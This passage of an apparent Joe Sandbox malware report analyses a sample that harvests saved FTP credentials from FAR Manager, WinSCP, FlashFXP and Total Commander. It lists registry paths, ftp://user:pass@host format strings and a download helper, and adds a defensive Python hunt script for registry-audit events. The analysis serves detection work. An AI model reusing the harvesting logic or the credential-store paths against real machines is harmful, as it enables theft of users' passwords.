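; no port key: GetPrivateProfileInt returns the default, 21
[notes]
comment=not a site
"""

if __name__ == "__main__":
    for url in harvest_host_style(SAMPLE_HOST_STYLE_INI) + harvest_port_style(SAMPLE_PORT_STYLE_INI):
        print(url)
```

                          Running it prints one ftp:// URL per credential entry, with the [connections] and [notes] sections dropped because they carry no host or user key; the ftp://user:pass@host form embeds the password in clear, which is what makes a proxy or DLP rule for that URL shape a cheap check for this family's collection output.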

                          Control-flow Graph
                          (rendered graph not reproduced; basic-block listing omitted. API nodes recoverable from the graph for the function starting at 004027E6: OleInitialize, SysAllocString (several call sites), SysFreeString)
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 004027F5
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Internet$InitializeOpenOption
                          • String ID: From: true
                          • API String ID: 1176259655-9585188
                          • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                          • Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

                          Control-flow Graph
                          (rendered graph not reproduced; basic-block listing omitted. API nodes recoverable from the graph for the function starting at 00402E3E: GetModuleFileNameW, GetCurrentDirectoryW, GetLastError (three call sites))
                          APIs
                            • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                          • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                          • GetLastError.KERNEL32(?), ref: 00402F4E
                          • GetLastError.KERNEL32 ref: 00403237
                          • GetLastError.KERNEL32(?), ref: 00403258
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                          • String ID: .html$From: $Via: $^client=$^key=$file$none
                          • API String ID: 2247176544-3749385445
                          • Opcode ID: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                          • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                          • Opcode Fuzzy Hash: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                          • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                          • RegCloseKey.ADVAPI32(?), ref: 0040442A
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapOpen$AllocCloseEnumFree
                          • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                          • API String ID: 416369273-4007225339
                          • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                          • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                          • RegCloseKey.ADVAPI32(?), ref: 0040476D
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocCloseEnumHeapOpen
                          • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                          • API String ID: 3497950970-285550827
                          • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                          • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
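                          The registry functions above read the stores of three unrelated FTP clients from one binary: Total Commander under HKLM (RegOpenKeyExW with 80000002), and the FAR Manager keys SOFTWARE\Far\Plugins\ftp\hosts and SOFTWARE\Far2\Plugins\ftp\hosts and the WinSCP key SOFTWARE\martin prikryl\winscp 2\sessions under HKCU (80000001), each walked with RegEnumKeyExW. That gives a host-side hunt signal that is stronger than any single key: one process opening several clients' credential stores. The Python below is an added example, not part of the report or of any Joe Sandbox tooling; it scores Windows Security 4656 (handle to a registry key requested) events against those key paths. Assumptions: the events are constructed samples that use 4656 field names (ObjectName, ProcessName, ProcessId) with invented process names, PIDs and SIDs, and the allowlist of each client's own executable is illustrative. Two operational caveats: 4656 is only generated for keys that carry an audit SACL, and Sysmon's registry events (12/13/14) record create, delete, set and rename, not key opens, so this detection needs object-access auditing enabled on exactly these keys.

```python
"""Hunt for one process reading the FTP credential stores of several clients.
Added example for this report, not code from the sample or from Joe Sandbox.

Input: Windows Security 4656 ("A handle to an object was requested") events
for registry keys. The events below are constructed sample data; field names
follow the 4656 schema, process names, PIDs and SIDs are invented.
"""
from collections import defaultdict

# Key paths from the String IDs in the report. The sample opens the Total
# Commander key under HKLM (RegOpenKeyExW 80000002) and the FAR and WinSCP
# keys under HKCU (80000001); in 4656 events those appear as
# \REGISTRY\MACHINE\... and \REGISTRY\USER\<SID>\..., so matching is by suffix.
CREDENTIAL_STORES = {
    r"\software\ghisler\total commander":          "Total Commander",
    r"\software\far\plugins\ftp\hosts":            "FAR Manager",
    r"\software\far2\plugins\ftp\hosts":           "FAR Manager",
    r"\software\martin prikryl\winscp 2\sessions": "WinSCP",
}

# Illustrative allowlist of each client's own executable (assumption; extend
# it from your software inventory).
EXPECTED_READERS = {
    "Total Commander": {"totalcmd.exe", "totalcmd64.exe"},
    "FAR Manager":     {"far.exe"},
    "WinSCP":          {"winscp.exe"},
}


def store_for_key(object_name):
    """Client whose FTP store object_name is (or is a subkey of), else None.
    Registry paths are case-insensitive; subkeys matter because the sample
    enumerates per-session subkeys with RegEnumKeyExW."""
    name = object_name.lower().rstrip("\\")
    for suffix, client in CREDENTIAL_STORES.items():
        if name.endswith(suffix) or (suffix + "\\") in name:
            return client
    return None


def image_name(process_name):
    """Base name of the process image, lower-cased."""
    return process_name.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_credential_harvesters(events):
    """Return {(pid, image): [stores]} for every process that opened an FTP
    credential store it is not the expected reader of."""
    touched = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4656 or ev.get("ObjectType") != "Key":
            continue
        client = store_for_key(ev["ObjectName"])
        if client is None:
            continue
        image = image_name(ev["ProcessName"])
        if image in EXPECTED_READERS[client]:
            continue
        touched[(ev["ProcessId"], image)].add(client)
    return {key: sorted(stores) for key, stores in touched.items()}


def severity(stores):
    """One foreign store may be a backup or migration tool; two or more
    unrelated clients' stores from one process is the pattern in this report."""
    return "high" if len(stores) >= 2 else "medium"


_SID = "S-1-5-21-1111-2222-3333-1001"  # invented
SAMPLE_EVENTS = [  # constructed sample events
    {"EventID": 4656, "ObjectType": "Key", "ProcessId": 4120,
     "ProcessName": r"C:\Windows\netprotdrvss.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Ghisler\Total Commander"},
    {"EventID": 4656, "ObjectType": "Key", "ProcessId": 4120,
     "ProcessName": r"C:\Windows\netprotdrvss.exe",
     "ObjectName": r"\REGISTRY\USER\%s\SOFTWARE\Far\Plugins\ftp\hosts" % _SID},
    {"EventID": 4656, "ObjectType": "Key", "ProcessId": 4120,
     "ProcessName": r"C:\Windows\netprotdrvss.exe",
     "ObjectName": r"\REGISTRY\USER\%s\SOFTWARE\martin prikryl\winscp 2\sessions\prod-ftp" % _SID},
    {"EventID": 4656, "ObjectType": "Key", "ProcessId": 2244,
     "ProcessName": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "ObjectName": r"\REGISTRY\USER\%s\SOFTWARE\martin prikryl\winscp 2\sessions" % _SID},
    {"EventID": 4656, "ObjectType": "Key", "ProcessId": 3008,
     "ProcessName": r"C:\Tools\backupagent.exe",
     "ObjectName": r"\REGISTRY\USER\%s\SOFTWARE\Far2\Plugins\ftp\hosts" % _SID},
    {"EventID": 4663, "ObjectType": "File", "ProcessId": 4120,
     "ProcessName": r"C:\Windows\netprotdrvss.exe",
     "ObjectName": r"C:\Users\u\wcx_ftp.ini"},
]

if __name__ == "__main__":
    for (pid, image), stores in sorted(find_credential_harvesters(SAMPLE_EVENTS).items()):
        print("%s pid=%d %s -> %s" % (severity(stores), pid, image, ", ".join(stores)))
```

                          On the constructed events the sample's dropped executable name scores high (three stores from one PID), the backup tool scores medium (one foreign store) and WinSCP reading its own sessions key is ignored. The split by PID rather than by image name matters because the report shows the sample injecting into other processes; aggregate per process, not per binary, when you port this to a SIEM query.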
                          APIs
                          • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                            (dwFlags 04400000 = INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION. The "hOA" shown in the URL argument is not a string: the bytes 68 4F 41 00 are the little-endian dword 00414F68, a pointer into the image's data area that the plugin rendered as text. The same applies to the "hOA" entries in the String ID lines of the functions below.)
                          • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                          • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                          • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                          • String ID: hOA
                          • API String ID: 1355009786-3485425990
                          • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                          • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                          APIs
                          • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                          • SysFreeString.OLEAUT32(?), ref: 00409359
                          • SysFreeString.OLEAUT32(?), ref: 00409362
                          • SysAllocString.OLEAUT32(?), ref: 004093B8
                          • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$Free$Alloc$CharLower
                          • String ID: http:$javascript$+@
                          • API String ID: 1987340527-3375436608
                          • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                          • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                          APIs
                          • DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                          • GetLastError.KERNEL32(00000000), ref: 00407079
                          • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                          • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                          • CloseHandle.KERNEL32(00000000), ref: 004070BB
                            (download-to-file helper: delete any existing file, CreateFileW with GENERIC_WRITE (40000000), OPEN_ALWAYS (00000004) and FILE_ATTRIBUTE_NORMAL (00000080), truncate it with SetEndOfFile while the file pointer is still at offset 0, then open the URL. The 80000000 among the InternetOpenUrlW arguments is the value of INTERNET_FLAG_RELOAD, i.e. bypass the WinINet cache, although the static argument recovery shown here does not place it cleanly in the dwFlags slot.)
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                          • String ID:
                          • API String ID: 3711279109-0
                          • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                          • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountTick
                          • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                          • API String ID: 536389180-697497794
                          • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                          • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                          • API String ID: 3472027048-2333287219
                          • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                          • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                          APIs
                          • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: _self$http$+@
                          • API String ID: 1473721057-3317424838
                          • Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                          • Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                          • API String ID: 3546245721-1332223170
                          • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                          • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                          APIs
                          • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                          • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                          • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                            • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                            • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                            • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                          • String ID: Shell_TrayWnd$eventConn
                          • API String ID: 2141107913-3455059086
                          • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                          • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                          • StrStrIA.SHLWAPI(?,?), ref: 00404913
                          • StrStrIA.SHLWAPI(?,?), ref: 00404925
                          • StrStrIA.SHLWAPI(?,?), ref: 00404935
                          • StrStrIA.SHLWAPI(?,?), ref: 00404947
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                          • API String ID: 1635188419-1322549247
                          • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                          • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                          APIs
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                          • GetLocalTime.KERNEL32(?), ref: 00407387
                          • GetLocalTime.KERNEL32(?), ref: 0040738D
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                          • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                          • String ID:
                          • API String ID: 3166187867-0
                          • Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                          • Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID:
                          • String ID: http$+@
                          • API String ID: 0-4127549746
                          • Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                          • Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandFolderOpenPathStrings
                          • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                          • API String ID: 1994525040-4055253781
                          • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                          • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004099EB
                          • SysAllocString.OLEAUT32(?), ref: 004099F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </domain>$</url>$<domain>$<url>$http://
                          • API String ID: 2525500382-924421446
                          • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                          • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                          APIs
                          • SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
                          • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                          • Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
